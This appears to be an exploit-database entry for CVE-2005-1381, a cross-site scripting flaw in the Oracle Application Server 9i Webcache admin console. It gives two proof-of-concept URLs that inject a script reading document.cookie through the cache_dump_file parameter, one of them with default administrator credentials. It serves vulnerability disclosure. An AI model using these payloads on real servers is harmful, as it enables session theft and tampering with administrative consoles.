Oracle Application Server 9i - Webcache Cache_dump_file Cross-Site Scripting
Author: Alexander Kornbrust
type: remote
platform: multiple
port:
date_added: 2005-04-28
date_updated: 2013-05-20
verified: 1
codes: CVE-2005-1381;OSVDB-15910
tags:
aliases:
screenshot_url:
application_url:
source : https://www.securityfocus.com/bid/13421/info
A remote cross-site scripting vulnerability affects the Oracle Application Server 9i Webcache administration console. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.
The issue affects the 'cache_dump_file' parameter of the 'webcacheadmin' script.
http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
http://administrator:administrator@example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>